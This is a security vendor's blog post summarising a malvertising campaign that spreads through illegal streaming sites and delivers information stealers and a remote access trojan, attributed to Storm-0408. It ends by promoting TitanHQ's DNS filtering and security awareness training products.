A massive malvertising campaign has been identified that has infected nearly 1 million devices with malware since December 2024. Malvertising is the term used for advertisements that redirect users to a malicious website where credentials are stolen (phishing) or malware is downloaded. The malicious adverts are often added to legitimate ad networks, with the adverts pushed out to websites that are part of the ad network. As such, malicious adverts can be displayed on many legitimate websites which makes the adverts appear legitimate.
This campaign targets individuals who use illegal streaming websites. Malvertising redirectors have been added to the streaming sites that redirect visitors to GitHub, Discord, or Dropbox via an intermediary website. If the advertisement is clicked, the user will arrive on GitHub via a sophisticated redirection chain involving four or five redirects, with the first redirector embedded within an iframe on the streaming website.
The first stage payload is hosted on GitHub, where most users are redirected, although the first stage has also been identified on Discord and Dropbox. The first stage is used to drop second-stage files, which are used for system discovery and data exfiltration over HTTP. Data collected by the second stage files includes information about the device, such as the operating system, memory size, user paths, screen resolution, and graphics information.
After exfiltrating that information, third stage payloads are delivered based on the information collected by the second-stage files. The third stage payloads establish a connection to the command-and-control (C2) server and exfiltrate sensitive data from the device, and lead to a fourth stage, an AutoIT binary that uses PowerShell to open files, facilitate data exfiltration, add exclusions to Microsoft Defender to prevent detection, drop a remote access Trojan, and identify installed security software and other applications.
The campaign has been attributed to a threat group tracked by Microsoft Threat Intelligence as Storm-0408. The group is known to conduct phishing campaigns, search engine optimization (SEO) poisoning, and malvertising to deliver remote action trojans and information stealers for data theft. Malware variants known to be delivered in the malvertising campaign include the commodity information-stealing malware variants, Lumma Stealer and Doenerium, and the remote access trojan, Net Support RAT. The attacks are indiscriminate, targeting users of illegal streaming services rather than specific industries, with victims including consumers and enterprise employees.
There are several steps that enterprises can take to protect against malvertising, one of the most effective being a web filtering solution. The WebTitan DNS filter can be used to prevent users from visiting certain categories of websites, such as streaming sites and other high-risk websites. Illegal streaming services often host malware, so blocking access can prevent malware infections and enterprises can reduce legal risk by stopping employees from illegally streaming pirated content on company IP addresses. WebTitan can also be configured to block downloads of certain file types from the Internet, such as executable files that are used to install malware. Blocking these file downloads can also help enterprises control shadow IT – software not authorized by the IT department.
Security awareness training should also be provided to the workforce to help eradicate risky practices and raise awareness of threats such as phishing, malvertising, and malware. TitanHQ’s security awareness training program, SafeTitan, makes it easy to create and update training courses for the workforce to teach security best practices to reduce susceptibility to the full range of cyber threats and conduct phishing simulations. Give the TitanHQ team a call today for more information on protecting against malware and other cyber threats, or take advantage of a free trial of TitanHQ’s cybersecurity solutions and see for yourself the difference they make and how easy they are to use.